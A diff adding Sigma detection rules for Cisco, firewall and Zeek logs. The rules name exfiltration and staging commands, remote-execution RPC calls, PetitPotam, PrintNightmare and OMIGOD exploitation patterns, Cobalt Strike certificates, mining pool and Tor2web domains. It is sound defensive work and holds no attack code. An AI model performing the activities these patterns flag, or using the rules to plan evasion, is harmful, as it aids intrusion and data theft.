b/bin/main/rules/network/cisco/aaa/cisco_cli_local_accounts.yml @@ -0,0 +1,25 @@ +title: Cisco Local Accounts +id: 6d844f0f-1c18-41af-8f19-33e7654edfc3 +status: test +description: Find local accounts being created or modified as well as remote authentication configurations +author: Austin Clark +date: 2019/08/12 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'username' + - 'aaa' + condition: keywords +fields: + - CmdSet +falsepositives: + - When remote authentication is in place, this should not change often +level: high +tags: + - attack.persistence + - attack.t1136.001 + - attack.t1098 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_modify_config.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_modify_config.yml new file mode 100644 index 000000000..dffc9bced --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_modify_config.yml @@ -0,0 +1,34 @@ +title: Cisco Modify Configuration +id: 671ffc77-50a7-464f-9e3d-9ea2b493b26b +status: test +description: Modifications to a config that will serve an adversary's impacts or persistence +author: Austin Clark +date: 2019/08/12 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'ip http server' + - 'ip https server' + - 'kron policy-list' + - 'kron occurrence' + - 'policy-list' + - 'access-list' + - 'ip access-group' + - 'archive maximum' + condition: keywords +fields: + - CmdSet +falsepositives: + - Legitimate administrators may run these commands +level: medium +tags: + - attack.persistence + - attack.impact + - attack.t1490 + - attack.t1505 + - attack.t1565.002 + - attack.t1053 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_moving_data.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_moving_data.yml new file mode 100644 index 000000000..138a0f3d4 --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_moving_data.yml @@ -0,0 +1,33 @@ +title: Cisco Stage Data +id: 5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59 +status: test +description: Various protocols maybe used to put data on the device for exfil or infil +author: Austin Clark +date: 2019/08/12 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'tftp' + - 'rcp' + - 'puts' + - 'copy' + - 'configure replace' + - 'archive tar' + condition: keywords +fields: + - CmdSet +falsepositives: + - Generally used to copy configs or IOS images +level: low +tags: + - attack.collection + - attack.lateral_movement + - attack.command_and_control + - attack.exfiltration + - attack.t1074 + - attack.t1105 + - attack.t1560.001 diff --git a/bin/main/rules/network/cisco/aaa/cisco_cli_net_sniff.yml b/bin/main/rules/network/cisco/aaa/cisco_cli_net_sniff.yml new file mode 100644 index 000000000..a6d646dd1 --- /dev/null +++ b/bin/main/rules/network/cisco/aaa/cisco_cli_net_sniff.yml @@ -0,0 +1,26 @@ +title: Cisco Sniffing +id: b9e1f193-d236-4451-aaae-2f3d2102120d +status: test +description: Show when a monitor or a span/rspan is setup or modified +author: Austin Clark +date: 2019/08/11 +modified: 2021/11/27 +logsource: + product: cisco + service: aaa + category: accounting +detection: + keywords: + - 'monitor capture point' + - 'set span' + - 'set rspan' + condition: keywords +fields: + - CmdSet +falsepositives: + - Admins may setup new or modify old spans, or use a monitor for troubleshooting +level: medium +tags: + - attack.credential_access + - attack.discovery + - attack.t1040 diff --git a/bin/main/rules/network/firewall/net_firewall_high_dns_bytes_out.yml b/bin/main/rules/network/firewall/net_firewall_high_dns_bytes_out.yml new file mode 100644 index 000000000..aa45e6691 --- /dev/null +++ b/bin/main/rules/network/firewall/net_firewall_high_dns_bytes_out.yml @@ -0,0 +1,20 @@ +title: High DNS Bytes Out +id: 3b6e327d-8649-4102-993f-d25786481589 +status: experimental +description: High DNS queries bytes amount from host per short period of time +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048.003 +logsource: + category: firewall +detection: + selection: + dst_port: 53 + timeframe: 1m + condition: selection +falsepositives: + - Legitimate high DNS bytes out rate to domain name which should be added to whitelist +level: medium diff --git a/bin/main/rules/network/firewall/net_firewall_high_dns_requests_rate.yml b/bin/main/rules/network/firewall/net_firewall_high_dns_requests_rate.yml new file mode 100644 index 000000000..da2188e8c --- /dev/null +++ b/bin/main/rules/network/firewall/net_firewall_high_dns_requests_rate.yml @@ -0,0 +1,22 @@ +title: High DNS Requests Rate +id: 51186749-7415-46be-90e5-6914865c825a +status: experimental +description: High DNS requests amount from host per short period of time +author: Daniil Yugoslavskiy, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048.003 + - attack.command_and_control + - attack.t1071.004 +logsource: + category: firewall +detection: + selection: + dst_port: 53 + timeframe: 1m + condition: selection +falsepositives: + - Legitimate high DNS requests rate to domain name which should be added to whitelist +level: medium diff --git a/bin/main/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml b/bin/main/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml new file mode 100644 index 000000000..fa2343e8e --- /dev/null +++ b/bin/main/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml @@ -0,0 +1,25 @@ +title: Network Scans Count By Destination IP +id: 4601eaec-6b45-4052-ad32-2d96d26ce0d8 +status: test +description: Detects many failed connection attempts to different ports or hosts +author: Thomas Patzke +date: 2017/02/19 +modified: 2021/11/27 +logsource: + category: firewall +detection: + selection: + action: denied + timeframe: 24h + condition: selection +fields: + - src_ip + - dst_ip + - dst_port +falsepositives: + - Inventarization systems + - Vulnerability scans +level: medium +tags: + - attack.discovery + - attack.t1046 diff --git a/bin/main/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml b/bin/main/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml new file mode 100644 index 000000000..bd4e97784 --- /dev/null +++ b/bin/main/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml @@ -0,0 +1,25 @@ +title: Network Scans Count By Destination Port +id: fab0ddf0-b8a9-4d70-91ce-a20547209afb +status: experimental +description: Detects many failed connection attempts to different ports or hosts +author: Thomas Patzke +date: 2017/02/19 +modified: 2021/09/21 +logsource: + category: firewall +tags: + - attack.discovery + - attack.t1046 +detection: + selection: + action: denied + timeframe: 24h + condition: selection +falsepositives: + - Inventarization systems + - Vulnerability scans +level: medium +fields: + - src_ip + - dst_ip + - dst_port diff --git a/bin/main/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml b/bin/main/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml new file mode 100644 index 000000000..9972480a8 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml @@ -0,0 +1,35 @@ +title: Domain User Enumeration Network Recon 01 +description: Domain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller. The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29 +id: 66a0bdc6-ee04-441a-9125-99d2eb547942 +references: + - https://github.com/OTRF/detection-hackathon-apt29 + - https://github.com/OTRF/detection-hackathon-apt29/issues/37 +author: 'Nate Guagenti (@neu5ron), Open Threat Research (OTR)' +date: 2020/05/03 +modified: 2021/11/14 +tags: + - attack.discovery + - attack.t1087.002 + - attack.t1082 +logsource: + product: zeek + service: dce_rpc +detection: + selection: + operation: + #- LsarEnumerateTrustedDomains #potentially too many FPs, removing. caused by netlogon + #- SamrEnumerateDomainsInSamServer #potentially too many FPs, removing. #method obtains a listing of all domains hosted by the server side of this protocol. This value is a cookie that the server can use to continue an enumeration on a subsequent call + - LsarLookupNames3 #method translates a batch of security principal names to their SID form + - LsarLookupSids3 #translates a batch of security principal SIDs to their name forms + - SamrGetGroupsForUser #obtains a listing of groups that a user is a member of + - SamrLookupIdsInDomain #method translates a set of RIDs into account names + - SamrLookupNamesInDomain #method translates a set of account names into a set of RIDs + - SamrQuerySecurityObject #method queries the access control on a server, domain, user, group, or alias object + - SamrQueryInformationGroup #obtains attributes from a group object + timeframe: 30s + condition: selection +falsepositives: + - Devices that may do authentication like a VPN or a firewall that looksup IPs to username + - False positives depend on scripts and administrative tools used in the monitored environment +level: medium +status: experimental diff --git a/bin/main/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml b/bin/main/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml new file mode 100644 index 000000000..188fcef8b --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml @@ -0,0 +1,53 @@ +title: MITRE BZAR Indicators for Execution +id: b640c0b8-87f8-4daa-aef8-95a24261dd1d +status: test +description: 'Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE' +author: '@neu5ron, SOC Prime' +references: + - https://github.com/mitre-attack/bzar#indicators-for-attck-execution +date: 2020/03/19 +modified: 2021/11/27 +logsource: + product: zeek + service: dce_rpc +detection: + op1: + endpoint: 'JobAdd' + operation: 'atsvc' + op2: + endpoint: 'ITaskSchedulerService' + operation: 'SchRpcEnableTask' + op3: + endpoint: 'ITaskSchedulerService' + operation: 'SchRpcRegisterTask' + op4: + endpoint: 'ITaskSchedulerService' + operation: 'SchRpcRun' + op5: + endpoint: 'IWbemServices' + operation: 'ExecMethod' + op6: + endpoint: 'IWbemServices' + operation: 'ExecMethodAsync' + op7: + endpoint: 'svcctl' + operation: 'CreateServiceA' + op8: + endpoint: 'svcctl' + operation: 'CreateServiceW' + op9: + endpoint: 'svcctl' + operation: 'StartServiceA' + op10: + endpoint: 'svcctl' + operation: 'StartServiceW' + condition: 1 of op* +falsepositives: + - Windows administrator tasks or troubleshooting + - Windows management scripts or software +level: medium +tags: + - attack.execution + - attack.t1047 + - attack.t1053.002 + - attack.t1569.002 diff --git a/bin/main/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml b/bin/main/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml new file mode 100644 index 000000000..99f97de0b --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml @@ -0,0 +1,39 @@ +title: MITRE BZAR Indicators for Persistence +id: 53389db6-ba46-48e3-a94c-e0f2cefe1583 +status: test +description: 'Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.' +author: '@neu5ron, SOC Prime' +references: + - https://github.com/mitre-attack/bzar#indicators-for-attck-persistence +date: 2020/03/19 +modified: 2021/11/27 +logsource: + product: zeek + service: dce_rpc +detection: + op1: + endpoint: 'spoolss' + operation: 'RpcAddMonitor' + op2: + endpoint: 'spoolss' + operation: 'RpcAddPrintProcessor' + op3: + endpoint: 'IRemoteWinspool' + operation: 'RpcAsyncAddMonitor' + op4: + endpoint: 'IRemoteWinspool' + operation: 'RpcAsyncAddPrintProcessor' + op5: + endpoint: 'ISecLogon' + operation: 'SeclCreateProcessWithLogonW' + op6: + endpoint: 'ISecLogon' + operation: 'SeclCreateProcessWithLogonExW' + condition: 1 of op* +falsepositives: + - Windows administrator tasks or troubleshooting + - Windows management scripts or software +level: medium +tags: + - attack.persistence + - attack.t1547.004 diff --git a/bin/main/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/bin/main/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml new file mode 100644 index 000000000..489e3932c --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml @@ -0,0 +1,38 @@ +title: Potential PetitPotam Attack Via EFS RPC Calls +id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a +description: | + Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. + The usage of this RPC function should be rare if ever used at all. + Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. + View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' +status: experimental +author: '@neu5ron, @Antonlovesdnb, Mike Remen' +date: 2021/08/17 +references: + - https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp + - https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 + - https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf + - https://threatpost.com/microsoft-petitpotam-poc/168163/ +tags: + - attack.t1557.001 + - attack.t1187 +logsource: + product: zeek + service: dce_rpc +detection: + selection: + operation|startswith: + - 'Efs' + - 'efs' + condition: selection +falsepositives: + - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description). +level: medium +fields: + - id.orig_h + - id.resp_h + - id.resp_p + - operation + - endpoint + - named_pipe + - uid diff --git a/bin/main/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/bin/main/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml new file mode 100644 index 000000000..b0cdb547f --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -0,0 +1,46 @@ +title: Possible PrintNightmare Print Driver Install +id: 7b33baef-2a75-4ca3-9da4-34f9a15382d8 +description: | + Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). + The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. +author: '@neu5ron (Nate Guagenti)' +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29 + - https://github.com/zeek/zeek/blob/master/scripts/base/protocols/dce-rpc/consts.zeek + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 + - https://github.com/corelight/CVE-2021-1675 + - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml + - https://old.zeek.org/zeekweek2019/slides/bzar.pdf + - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ + +tags: + - attack.execution + - cve.2021.1678 + - cve.2021.1675 + - cve.2021.34527 +logsource: + product: zeek + service: dce_rpc +detection: + selection: + operation: + - 'RpcAsyncInstallPrinterDriverFromPackage' # "76f03f96-cdfd-44fc-a22c-64950a001209",0x3e + - 'RpcAsyncAddPrintProcessor' # "76f03f96-cdfd-44fc-a22c-64950a001209",0x2c + - 'RpcAddPrintProcessor' # "12345678-1234-abcd-ef00-0123456789ab",0x0e + - 'RpcAddPrinterDriverEx' # "12345678-1234-abcd-ef00-0123456789ab",0x59 + - 'RpcAddPrinterDriver' # "12345678-1234-abcd-ef00-0123456789ab",0x09 + - 'RpcAsyncAddPrinterDriver' # "76f03f96-cdfd-44fc-a22c-64950a001209",0x27 + condition: selection +falsepositives: + - Legitimate remote alteration of a printer driver. +level: medium +fields: + - id.orig_h + - id.resp_h + - id.resp_p + - operation + - endpoint + - named_pipe + - uid +status: stable diff --git a/bin/main/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml b/bin/main/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml new file mode 100644 index 000000000..59b8daad8 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml @@ -0,0 +1,25 @@ +title: SMB Spoolss Name Piped Usage +id: bae2865c-5565-470d-b505-9496c87d0c30 +description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. +status: experimental +author: OTR (Open Threat Research), @neu5ron +references: + - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 + - https://dirkjanm.io/a-different-way-of-abusing-zerologon/ + - https://twitter.com/_dirkjan/status/1309214379003588608 +tags: + - attack.lateral_movement + - attack.t1021.002 +date: 2018/11/28 +modified: 2021/08/23 +logsource: + product: zeek + service: smb_files +detection: + selection: + path|endswith: IPC$ + name: spoolss + condition: selection +falsepositives: + - Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too +level: medium diff --git a/bin/main/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml b/bin/main/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml new file mode 100644 index 000000000..abcb28927 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml @@ -0,0 +1,26 @@ +title: Default Cobalt Strike Certificate +id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118 +description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic +status: experimental +author: Bhabesh Raj +date: 2021/06/23 +modified: 2021/08/24 +references: + - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 +tags: + - attack.command_and_control + - attack.s0154 +logsource: + product: zeek + service: x509 +detection: + selection: + certificate.serial: 8BB00EE + condition: selection +fields: + - san.dns + - certificate.subject + - certificate.issuer +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/network/zeek/zeek_dns_mining_pools.yml b/bin/main/rules/network/zeek/zeek_dns_mining_pools.yml new file mode 100644 index 000000000..87868b483 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dns_mining_pools.yml @@ -0,0 +1,105 @@ +title: DNS Events Related To Mining Pools +id: bf74135c-18e8-4a72-a926-0e4f47888c19 +description: Identifies clients that may be performing DNS lookups associated with common currency mining pools. +status: experimental +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_Miners.yaml +date: 2021/08/19 +modified: 2021/08/23 +author: Saw Winn Naung, Azure-Sentinel, @neu5ron +level: low +logsource: + service: dns + product: zeek +tags: + - attack.t1569.002 + - attack.t1496 +detection: + selection: + query|endswith: + - 'monerohash.com' + - 'do-dear.com' + - 'xmrminerpro.com' + - 'secumine.net' + - 'xmrpool.com' + - 'minexmr.org' + - 'hashanywhere.com' + - 'xmrget.com' + - 'mininglottery.eu' + - 'minergate.com' + - 'moriaxmr.com' + - 'multipooler.com' + - 'moneropools.com' + - 'xmrpool.eu' + - 'coolmining.club' + - 'supportxmr.com' + - 'minexmr.com' + - 'hashvault.pro' + - 'xmrpool.net' + - 'crypto-pool.fr' + - 'xmr.pt' + - 'miner.rocks' + - 'walpool.com' + - 'herominers.com' + - 'gntl.co.uk' + - 'semipool.com' + - 'coinfoundry.org' + - 'cryptoknight.cc' + - 'fairhash.org' + - 'baikalmine.com' + - 'tubepool.xyz' + - 'fairpool.xyz' + - 'asiapool.io' + - 'coinpoolit.webhop.me' + - 'nanopool.org' + - 'moneropool.com' + - 'miner.center' + - 'prohash.net' + - 'poolto.be' + - 'cryptoescrow.eu' + - 'monerominers.net' + - 'cryptonotepool.org' + - 'extrmepool.org' + - 'webcoin.me' + - 'kippo.eu' + - 'hashinvest.ws' + - 'monero.farm' + - 'linux-repository-updates.com' + - '1gh.com' + - 'dwarfpool.com' + - 'hash-to-coins.com' + - 'pool-proxy.com' + - 'hashfor.cash' + - 'fairpool.cloud' + - 'litecoinpool.org' + - 'mineshaft.ml' + - 'abcxyz.stream' + - 'moneropool.ru' + - 'cryptonotepool.org.uk' + - 'extremepool.org' + - 'extremehash.com' + - 'hashinvest.net' + - 'unipool.pro' + - 'crypto-pools.org' + - 'monero.net' + - 'backup-pool.com' + - 'mooo.com' # Dynamic DNS, may want to exclude + - 'freeyy.me' + - 'cryptonight.net' + - 'shscrypto.net' + exclude_answers: + answers: + - '127.0.0.1' + - '0.0.0.0' + exclude_rejected: + rejected: 'true' + condition: selection and not (exclude_answers or exclude_rejected) +falsepositives: + - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'. +fields: + - id.orig_h + - id.resp_h + - query + - answers + - qtype_name + - rcode_name diff --git a/bin/main/rules/network/zeek/zeek_dns_nkn.yml b/bin/main/rules/network/zeek/zeek_dns_nkn.yml new file mode 100644 index 000000000..35c1bc3d6 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dns_nkn.yml @@ -0,0 +1,28 @@ +title: New Kind of Network (NKN) Detection +id: fa7703d6-0ee8-4949-889c-48c84bc15b6f +status: experimental +description: NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma> +references: + - https://github.com/nknorg/nkn-sdk-go + - https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ + - https://github.com/Maka8ka/NGLite +tags: + - attack.command_and_control +author: Michael Portera (@mportatoes) +date: 2022/04/21 +logsource: + product: zeek + service: dns +detection: + selection: + query|contains|all: + - 'seed' + - '.nkn.org' + condition: selection +fields: + - id.orig_h + - id.resp_h + - answers +falsepositives: + - Unknown +level: low diff --git a/bin/main/rules/network/zeek/zeek_dns_susp_zbit_flag.yml b/bin/main/rules/network/zeek/zeek_dns_susp_zbit_flag.yml new file mode 100644 index 000000000..306a153b0 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dns_susp_zbit_flag.yml @@ -0,0 +1,71 @@ +title: Suspicious DNS Z Flag Bit Set +id: ede05abc-2c9e-4624-9944-9ff17fdc0bf5 +description: 'The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs' +status: experimental +date: 2021/05/04 +modified: 2022/02/24 +references: + - 'https://twitter.com/neu5ron/status/1346245602502443009' + - 'https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma' + - 'https://tools.ietf.org/html/rfc2929#section-2.1' + - 'https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS' +author: '@neu5ron, SOC Prime Team, Corelight' +tags: + - attack.t1095 + - attack.t1571 + - attack.command_and_control +logsource: + product: zeek + service: dns +detection: + z_flag_unset: + Z: '0' + most_probable_valid_domain: + query|contains: '.' + exclude_tlds: + query|endswith: + - '.arpa' + - '.local' + - '.ultradns.net' + - '.twtrdns.net' + - '.azuredns-prd.info' + - '.azure-dns.com' + - '.azuredns-ff.info' + - '.azuredns-ff.org' + - '.azuregov-dns.org' + exclude_query_types: + qtype_name: + - 'NS' + - 'ns' + - 'MX' + - 'mx' + exclude_responses: + answers|endswith: '\\x00' + exclude_netbios: + id.resp_p: + - '137' + - '138' + - '139' + condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios) +falsepositives: + - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.' + - 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"' +level: medium +fields: + - ts + - id.orig_h + - id.orig_p + - id.resp_h + - id.resp_p + - proto + - qtype_name + - qtype + - query + - answers + - rcode + - rcode_name + - trans_id + - qtype + - ttl + - AA + - uid diff --git a/bin/main/rules/network/zeek/zeek_dns_torproxy.yml b/bin/main/rules/network/zeek/zeek_dns_torproxy.yml new file mode 100644 index 000000000..a227bb586 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_dns_torproxy.yml @@ -0,0 +1,52 @@ +title: DNS TOR Proxies +id: a8322756-015c-42e7-afb1-436e85ed3ff5 +description: Identifies IPs performing DNS lookups associated with common Tor proxies. +status: experimental +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_TorProxies.yaml +date: 2021/08/15 +author: Saw Winn Naung , Azure-Sentinel +level: medium +logsource: + service: dns + product: zeek +tags: + - attack.t1048 +detection: + selection: + query: + - 'tor2web.org' + - 'tor2web.com' + - 'torlink.co' + - 'onion.to' + - 'onion.ink' + - 'onion.cab' + - 'onion.nu' + - 'onion.link' + - 'onion.it' + - 'onion.city' + - 'onion.direct' + - 'onion.top' + - 'onion.casa' + - 'onion.plus' + - 'onion.rip' + - 'onion.dog' + - 'tor2web.fi' + - 'tor2web.blutmagie.de' + - 'onion.sh' + - 'onion.lu' + - 'onion.pet' + - 't2w.pw' + - 'tor2web.ae.org' + - 'tor2web.io' + - 'tor2web.xyz' + - 'onion.lt' + - 's1.tor-gateways.de' + - 's2.tor-gateways.de' + - 's3.tor-gateways.de' + - 's4.tor-gateways.de' + - 's5.tor-gateways.de' + - 'hiddenservice.net' + condition: selection +fields: + - clientip diff --git a/bin/main/rules/network/zeek/zeek_http_executable_download_from_webdav.yml b/bin/main/rules/network/zeek/zeek_http_executable_download_from_webdav.yml new file mode 100644 index 000000000..cb04ce559 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_http_executable_download_from_webdav.yml @@ -0,0 +1,27 @@ +title: Executable from Webdav +id: aac2fd97-bcba-491b-ad66-a6edf89c71bf +status: test +description: 'Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/' +author: 'SOC Prime, Adam Swan' +references: + - http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html + - https://github.com/OTRF/detection-hackathon-apt29 +date: 2020/05/01 +modified: 2021/11/27 +logsource: + product: zeek + service: http +detection: + selection_webdav: + - c-useragent|contains: 'WebDAV' + - c-uri|contains: 'webdav' + selection_executable: + - resp_mime_types|contains: 'dosexec' + - c-uri|endswith: '.exe' + condition: selection_webdav and selection_executable +falsepositives: + - Unknown +level: medium +tags: + - attack.command_and_control + - attack.t1105 diff --git a/bin/main/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml b/bin/main/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml new file mode 100644 index 000000000..f8f5fc693 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml @@ -0,0 +1,54 @@ +title: OMIGOD HTTP No Authentication RCE +id: ab6b1a39-a9ee-4ab4-b075-e83acf6e346b +description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request. +author: Nate Guagenti (neu5ron) +date: 2021/09/20 +modified: 2019/09/20 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://twitter.com/neu5ron/status/1438987292971053057?s=20 +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.lateral_movement + - attack.t1068 + - attack.t1190 + - attack.t1203 + - attack.t1021.006 + - attack.t1210 +logsource: + product: zeek + service: http + definition: Enable the builtin Zeek script that logs all HTTP header names by adding "@load policy/protocols/http/header-names" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/master/scripts/policy/protocols/http/header-names.zeek +detection: + selection: + status_code: 200 + uri: /wsman + method: POST + auth_header: + client_header_names|contains: 'AUTHORIZATION' + too_small_http_client_body: + request_body_len: 0 + #winrm_ports: + # id.resp_p: + # - 5985 + # - 5986 + # - 1270 + condition: selection and not auth_header and not too_small_http_client_body + #condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule +falsepositives: + - Exploits that were attempted but unsuccessful. + - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips. +level: high +fields: + - id.orig_h + - id.resp_h + - id.resp_p + - status_code + - method + - uri + - request_body_len + - response_body_len + - user_agent +status: stable diff --git a/bin/main/rules/network/zeek/zeek_http_webdav_put_request.yml b/bin/main/rules/network/zeek/zeek_http_webdav_put_request.yml new file mode 100644 index 000000000..ed3a28834 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_http_webdav_put_request.yml @@ -0,0 +1,28 @@ +title: WebDav Put Request +id: 705072a5-bb6f-4ced-95b6-ecfa6602090b +status: test +description: A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration. +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +references: + - https://github.com/OTRF/detection-hackathon-apt29/issues/17 +date: 2020/05/02 +modified: 2021/11/27 +logsource: + product: zeek + service: http +detection: + selection: + user_agent|contains: 'WebDAV' + method: 'PUT' + filter: + id.resp_h: + - 192.168.0.0/16 + - 172.16.0.0/12 + - 10.0.0.0/8 + condition: selection and not filter +falsepositives: + - Unknown +level: low +tags: + - attack.exfiltration + - attack.t1048.003 diff --git a/bin/main/rules/network/zeek/zeek_rdp_public_listener.yml b/bin/main/rules/network/zeek/zeek_rdp_public_listener.yml new file mode 100644 index 000000000..8674e33f3 --- /dev/null +++ b/bin/main/rules/network/zeek/zeek_rdp_public_listener.yml @@ -0,0 +1,47 @@ +title: Publicly Accessible RDP Service +id: 1fc0809e-06bf-4de3-ad52-25e5263b7623 +status: experimental +description: Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service. +references: + - https://attack.mitre.org/techniques/T1021/001/ +tags: + - attack.t1021.001 +author: 'Josh Brower @DefensiveDepth' +date: 2020/08/22 +modified: 2021/11/14 +logsource: + product: zeek 